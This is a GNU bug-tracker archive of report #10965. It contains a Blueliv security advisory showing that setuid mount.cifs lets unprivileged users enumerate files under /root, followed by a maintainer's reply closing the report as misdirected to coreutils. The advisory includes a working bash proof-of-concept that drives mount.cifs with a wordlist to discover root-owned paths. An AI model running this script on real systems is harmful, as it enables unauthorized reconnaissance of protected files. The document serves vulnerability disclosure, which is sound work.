From unknown Fri Aug 15 14:15:24 2025
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable
MIME-Version: 1.0
X-Mailer: MIME-tools 5.509 (Entity 5.509)
Content-Type: text/plain; charset=utf-8
From: bug#10965 <10965@debbugs.gnu.org>
To: bug#10965 <10965@debbugs.gnu.org>
Subject: Status: mount.cifs vulnerability
Reply-To: bug#10965 <10965@debbugs.gnu.org>
Date: Fri, 15 Aug 2025 21:15:24 +0000

retitle 10965 mount.cifs vulnerability
reassign 10965 coreutils
submitter 10965 Jesus Olmos <jesus.olmos@blueliv.com>
severity 10965 normal
tag 10965 notabug

thanks


From debbugs-submit-bounces@debbugs.gnu.org Wed Mar 07 13:39:06 2012
Received: (at submit) by debbugs.gnu.org; 7 Mar 2012 18:39:06 +0000
Received: from localhost ([127.0.0.1]:37846 helo=debbugs.gnu.org)
	by debbugs.gnu.org with esmtp (Exim 4.72)
	(envelope-from <debbugs-submit-bounces@debbugs.gnu.org>)
	id 1S5LlS-0007Gu-2L
	for submit@debbugs.gnu.org; Wed, 07 Mar 2012 13:39:06 -0500
Received: from eggs.gnu.org ([208.118.235.92]:36213)
	by debbugs.gnu.org with esmtp (Exim 4.72)
	(envelope-from <jesus.olmos@blueliv.com>) id 1S5LhQ-0007B6-SP
	for submit@debbugs.gnu.org; Wed, 07 Mar 2012 13:35:07 -0500
Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
	(envelope-from <jesus.olmos@blueliv.com>) id 1S5LgM-00028i-4M
	for submit@debbugs.gnu.org; Wed, 07 Mar 2012 13:33:56 -0500
X-Spam-Checker-Version: SpamAssassin 3.3.2 (2011-06-06) on eggs.gnu.org
X-Spam-Level: 
X-Spam-Status: No, score=-6.9 required=5.0 tests=BAYES_00,RCVD_IN_DNSWL_HI
	autolearn=unavailable version=3.3.2
Received: from lists.gnu.org ([208.118.235.17]:35615)
	by eggs.gnu.org with esmtp (Exim 4.71)
	(envelope-from <jesus.olmos@blueliv.com>) id 1S5LgM-00028T-0i
	for submit@debbugs.gnu.org; Wed, 07 Mar 2012 13:33:50 -0500
Received: from eggs.gnu.org ([208.118.235.92]:47323)
	by lists.gnu.org with esmtp (Exim 4.71)
	(envelope-from <jesus.olmos@blueliv.com>) id 1S5Lg1-0001ps-Lx
	for bug-coreutils@gnu.org; Wed, 07 Mar 2012 13:33:49 -0500
Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71)
	(envelope-from <jesus.olmos@blueliv.com>) id 1S5Lfu-0001qx-Jo
	for bug-coreutils@gnu.org; Wed, 07 Mar 2012 13:33:29 -0500
Received: from moutng.kundenserver.de ([212.227.126.187]:58874)
	by eggs.gnu.org with esmtp (Exim 4.71)
	(envelope-from <jesus.olmos@blueliv.com>) id 1S5Lfu-0001qb-9G
	for bug-coreutils@gnu.org; Wed, 07 Mar 2012 13:33:22 -0500
Received: from [192.168.4.52] ([212.31.49.190])
	by mrelayeu.kundenserver.de (node=mreu0) with ESMTP (Nemesis)
	id 0LdZnq-1Smcpx30JW-00inpo; Wed, 07 Mar 2012 19:33:19 +0100
Message-ID: <4F57AA0D.7030009@blueliv.com>
Date: Wed, 07 Mar 2012 19:33:49 +0100
From: Jesus Olmos <jesus.olmos@blueliv.com>
Organization: Blueliv
User-Agent: Mozilla/5.0 (X11; Linux x86_64;
	rv:8.0) Gecko/20111108 Thunderbird/8.0
MIME-Version: 1.0
To: bug-coreutils@gnu.org
Subject: mount.cifs vulnerability
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
X-Provags-ID: V02:K0:42XloBqSO3Tsks6tR51U6qa1Jwu+1nu2XGvqYFlx2mr
	ZNjM3Xv6d9WgzAnDN3LlnZLe1RRhTVgF6WC1M4K9U2Lp614PSF
	oBFrXzmPc1FnLFklcayN4HxEU0R5LdaZDqTcCWmYkD4mQlv/j2
	ht0cKaiP8HsulS9rzSKfPt7PkXRUvbqBhufqK3HExTGMdWS2ce
	CGtr3+HfxBtyMxF+Np53BgBED9ZJ7OJ11NVZ33cwsamnnuEU0v
	7vw5p8IUPGxVFHjKcfWrISFAG5Qv83B6jays7azG+GtBiuPYo9
	GsfzubQ9rdqmx+lR7iWD6FJKPs0M90KQrgsIek2jypwFf81dr6
	Vt0wvPiaOSa51feV0nPo=
X-detected-operating-system: by eggs.gnu.org: Genre and OS details not
	recognized.
X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.6 (newer, 3)
X-Received-From: 208.118.235.17
X-Spam-Score: -6.9 (------)
X-Debbugs-Envelope-To: submit
X-Mailman-Approved-At: Wed, 07 Mar 2012 13:38:54 -0500
X-BeenThere: debbugs-submit@debbugs.gnu.org
X-Mailman-Version: 2.1.13
Precedence: list
List-Id: <debbugs-submit.debbugs.gnu.org>
List-Unsubscribe: <http://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>,
	<mailto:debbugs-submit-request@debbugs.gnu.org?subject=unsubscribe>
List-Archive: <http://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit>
List-Post: <mailto:debbugs-submit@debbugs.gnu.org>
List-Help: <mailto:debbugs-submit-request@debbugs.gnu.org?subject=help>
List-Subscribe: <http://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>,
	<mailto:debbugs-submit-request@debbugs.gnu.org?subject=subscribe>
Sender: debbugs-submit-bounces@debbugs.gnu.org
Errors-To: debbugs-submit-bounces@debbugs.gnu.org
X-Spam-Score: -6.9 (------)

Hello, here is a bug report for mount.cifs,
is a little security breach on linux permissions by controlling a 
privileged chdir()

regards.



########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################

1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.

This software mounts cifs partition to authorized directories by fstab.


3. DESCRIPTION
-------------------------
Althow there is not authorized cifs mounts, is possible by the second 
parameter
to control a privileged chdir() syscall and infer the return value throught
the responses.

This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.

This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...

one of the attack vectors is /root/ directory scan:

[sha0@spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

Also let to enumerate sub-sub directories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos@blueliv.com
# discover root protected files & directories, user homes, process 
descriptors, ...

path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
         echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
         echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,

This method of transfer files, is highly dangerous and can rely on a 
remote control of the server

6. SYSTEMS AFFECTED
-------------------------
all versions are affected

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV

10. DISCOLSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



-- 
Jesus Olmos
jesus.olmos@blueliv.com

Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900





From debbugs-submit-bounces@debbugs.gnu.org Wed Mar 07 13:47:35 2012
Received: (at control) by debbugs.gnu.org; 7 Mar 2012 18:47:35 +0000
Received: from localhost ([127.0.0.1]:37862 helo=debbugs.gnu.org)
	by debbugs.gnu.org with esmtp (Exim 4.72)
	(envelope-from <debbugs-submit-bounces@debbugs.gnu.org>)
	id 1S5Lte-0007UT-Oc
	for submit@debbugs.gnu.org; Wed, 07 Mar 2012 13:47:35 -0500
Received: from mx1.redhat.com ([209.132.183.28]:53101)
	by debbugs.gnu.org with esmtp (Exim 4.72)
	(envelope-from <eblake@redhat.com>)
	id 1S5Lt6-0007TH-Og; Wed, 07 Mar 2012 13:47:12 -0500
Received: from int-mx10.intmail.prod.int.phx2.redhat.com
	(int-mx10.intmail.prod.int.phx2.redhat.com [10.5.11.23])
	by mx1.redhat.com (8.14.4/8.14.4) with ESMTP id q27IjtH5011583
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK);
	Wed, 7 Mar 2012 13:45:55 -0500
Received: from [10.3.113.123] (ovpn-113-123.phx2.redhat.com [10.3.113.123])
	by int-mx10.intmail.prod.int.phx2.redhat.com (8.14.4/8.14.4) with ESMTP
	id q27IjtCE003792; Wed, 7 Mar 2012 13:45:55 -0500
Message-ID: <4F57ACE2.4070703@redhat.com>
Date: Wed, 07 Mar 2012 11:45:54 -0700
From: Eric Blake <eblake@redhat.com>
Organization: Red Hat
User-Agent: Mozilla/5.0 (X11; Linux x86_64;
	rv:10.0.1) Gecko/20120216 Thunderbird/10.0.1
MIME-Version: 1.0
To: Jesus Olmos <jesus.olmos@blueliv.com>
Subject: Re: bug#10965: mount.cifs vulnerability
References: <4F57AA0D.7030009@blueliv.com>
In-Reply-To: <4F57AA0D.7030009@blueliv.com>
X-Enigmail-Version: 1.3.5
OpenPGP: url=http://people.redhat.com/eblake/eblake.gpg
Content-Type: multipart/signed; micalg=pgp-sha256;
	protocol="application/pgp-signature";
	boundary="------------enig5A73070F41BEC7F51410137D"
X-Scanned-By: MIMEDefang 2.68 on 10.5.11.23
X-Spam-Score: -6.9 (------)
X-Debbugs-Envelope-To: control
Cc: 10965-done@debbugs.gnu.org
X-BeenThere: debbugs-submit@debbugs.gnu.org
X-Mailman-Version: 2.1.13
Precedence: list
List-Id: <debbugs-submit.debbugs.gnu.org>
List-Unsubscribe: <http://debbugs.gnu.org/cgi-bin/mailman/options/debbugs-submit>,
	<mailto:debbugs-submit-request@debbugs.gnu.org?subject=unsubscribe>
List-Archive: <http://debbugs.gnu.org/cgi-bin/mailman/private/debbugs-submit>
List-Post: <mailto:debbugs-submit@debbugs.gnu.org>
List-Help: <mailto:debbugs-submit-request@debbugs.gnu.org?subject=help>
List-Subscribe: <http://debbugs.gnu.org/cgi-bin/mailman/listinfo/debbugs-submit>,
	<mailto:debbugs-submit-request@debbugs.gnu.org?subject=subscribe>
Sender: debbugs-submit-bounces@debbugs.gnu.org
Errors-To: debbugs-submit-bounces@debbugs.gnu.org
X-Spam-Score: -6.9 (------)

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enig5A73070F41BEC7F51410137D
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable

tag 10965 notabug
thanks

On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()

Thanks for the report, but you have sent it to the wrong list.  GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything.  I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.

--=20
Eric Blake   eblake@redhat.com    +1-919-301-3266
Libvirt virtualization library http://libvirt.org


--------------enig5A73070F41BEC7F51410137D
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Public key at http://people.redhat.com/eblake/eblake.gpg
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEcBAEBCAAGBQJPV6ziAAoJEKeha0olJ0NqaNIH/RX2aVImHb0Tx4TZhJzNq6FI
GH3K/JQSN7uWQIlIxs6uyLWKva/CAbCSsSVLtrKEYZ9QhL2N9dSpNz5Anyq9MUAj
TtQOmAQVM7E8bFDNz5scZB5cKoom/OSlBec2DTzNaHkq2bhQF7XFS+fBDbfq9SGz
qCfmW7m1HWrFaVpAuXazV5YD8TDbQTD6atRXMt0d7Cd2Jqkzn5yIKqvnqMOonhLG
iisfd/dbXR4rF4FxYWeQwkAcM3LeQ8uyWMNfLxuIvgxR8P7kwM4IQTVBQP8Sirs6
zas8PsXRTm/6/LFjdXanwoOhIsoO6xeg0qMtrzd2aGfEhAbFbyppeSBAMjUnn0I=
=G0k8
-----END PGP SIGNATURE-----

--------------enig5A73070F41BEC7F51410137D--




From unknown Fri Aug 15 14:15:24 2025
Received: (at fakecontrol) by fakecontrolmessage;
To: internal_control@debbugs.gnu.org
From: Debbugs Internal Request <help-debbugs@gnu.org>
Subject: Internal Control
Message-Id: bug archived.
Date: Thu, 05 Apr 2012 11:24:03 +0000
User-Agent: Fakemail v42.6.9

# This is a fake control message.
#
# The action:
# bug archived.
thanks
# This fakemail brought to you by your local debbugs
# administrator